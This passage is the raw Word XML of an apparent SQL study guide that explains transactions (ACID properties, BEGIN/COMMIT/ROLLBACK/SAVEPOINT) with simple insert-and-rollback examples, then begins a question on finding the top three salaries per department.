      </w:r>
    </w:p>
    <w:p w14:paraId="42B2BF7E" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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Key Concepts of SQL Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E690FB3"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ACID Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C3870" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Atomicity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that a transaction is treated as a single "unit" of work. Either all operations within the transaction are successfully executed, or none of them are. If one operation fails, the entire transaction is rolled back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E2EE7" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the database moves from one valid state to another. After the transaction, the database must be consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A2477" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the operations of a transaction are isolated from other transactions. Intermediate states of the transaction are not visible to other transactions until the transaction is completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3295CD30" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Durability</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that once a transaction is committed, its changes are permanent, even if there is a system failure afterward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED69C1"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Transaction Control Statements</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FED73F" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BEGIN TRANSACTION</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or START TRANSACTION in some systems): Marks the beginning of a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30946654" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>COMMIT</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Finalizes the transaction. All changes made during the transaction are permanently saved to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48266135" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ROLLBACK</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reverts all changes made during the transaction. It is used in case of errors or failures to ensure the database remains in a consistent state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036C0D0B" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SAVEPOINT</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A point within a transaction where you can roll back to a specific part of the transaction without affecting the entire transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D09DA" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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ample of SQL Transaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AFEC81"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Start a transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310D173"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BEGIN TRANSACTION;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674018A5" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FE5320"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Insert data into Employee table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C7BCA7"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INSERT INTO Employee (emp_id, emp_name, emp_salary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249D3E31"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VALUES (1, 'John Doe', 50000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F67AA61" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07001725"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lastRenderedPageBreak/>
        <w:t>-- Insert data into SalaryHistory table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298499FE"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INSERT INTO SalaryHistory (emp_id, salary, date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F147DE9"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VALUES (1, 50000, '2025-04-20');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F4F47" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22012565"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Commit the transaction to save changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21045BED"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COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F474A78"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In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D00C05A"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>BEGIN TRANSACTION</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> starts the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DFFF9C"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The SQL INSERT statements are part of the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DBF03"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If both INSERT operations are successful, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>COMMIT</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes the changes permanent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375D0E6"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If any of the operations fails, a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ROLLBACK</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be performed to undo any changes made within the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DBD64E" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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ample with Rollback:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B94482"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BEGIN TRANSACTION;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B85DE5C" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B02C91"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Insert data into Employee table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AA728B"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INSERT INTO Employee (emp_id, emp_name, emp_salary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F91D5B"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VALUES (1, 'Jane Doe', 60000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8043F" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF7DD12"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Simulate an error (e.g., insert into a table that doesn't exist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E8E2DD"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INSERT INTO NonExistentTable (column1) VALUES ('value');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495424A2" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0E275B"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If there's an error, rollback the entire transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060892FF"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ROLLBACK;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FBF850"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Here, if the second INSERT fails (because NonExistentTable does not exist), the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ROLLBACK</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that no changes (including the first insert) are made to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71C6F8" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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Use Cases for Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EACA85"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Banking Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To ensure that funds are deducted from one account and added to another atomically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F683385"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Order Processing Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To ensure that orders are processed in a consistent manner (e.g., items are reserved and payments are processed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8D6209"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To guarantee that a series of related updates are performed as one logical unit, without the risk of inconsistent data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6E29D" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="005C1C9E" w:rsidRDefault="001907E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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6077E0" w14:textId="77777777" w:rsidR="001907E9" w:rsidRPr="00CE4B95" w:rsidRDefault="001907E9" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL ensures that multiple database operations are handled in a reliable, consistent, and atomic manner. It allows for rollback in case of errors and ensures data integrity by following the ACID properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CEB1C1" w14:textId="0B001F3A"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106EF029">
          <v:rect id="_x0000_i3048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E12876" w14:textId="2E4AB43A" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="002E5BA0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="749" w:name="_Toc196308229"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="002E5BA0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="00AB298B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>uery</w:t>
      </w:r>
      <w:r w:rsidR="002E5BA0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Consider 2 tables, find out 3 employees who are earning the highest salary in each department?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="749"/>
    </w:p>
    <w:p w14:paraId="13DA398C" w14:textId="77777777" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="00564F5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE5AF2" w14:textId="77777777" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="00564F5D">
      <w:pPr>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t>employee_id (primary key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E53BA66" w14:textId="77777777" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="00564F5D">
      <w:pPr>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t>first_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D22B5A4" w14:textId="77777777" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="00564F5D">
      <w:pPr>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t>last_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179F4593" w14:textId="77777777" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="00564F5D">
      <w:pPr>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t>department_id (foreign key to departments.id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543CC895" w14:textId="77777777" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="00564F5D">
      <w:pPr>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t>salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE7CE1A" w14:textId="77777777" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="00564F5D">
      <w:pPr>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t>Hire_date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA8A58" w14:textId="77777777" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="00564F5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Departments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA3612" w14:textId="77777777" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="00564F5D">
      <w:pPr>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t>id (primary key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2B8B92" w14:textId="3CF94427" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="00564F5D" w:rsidP="00564F5D">
      <w:pPr>
        <w:rPr>
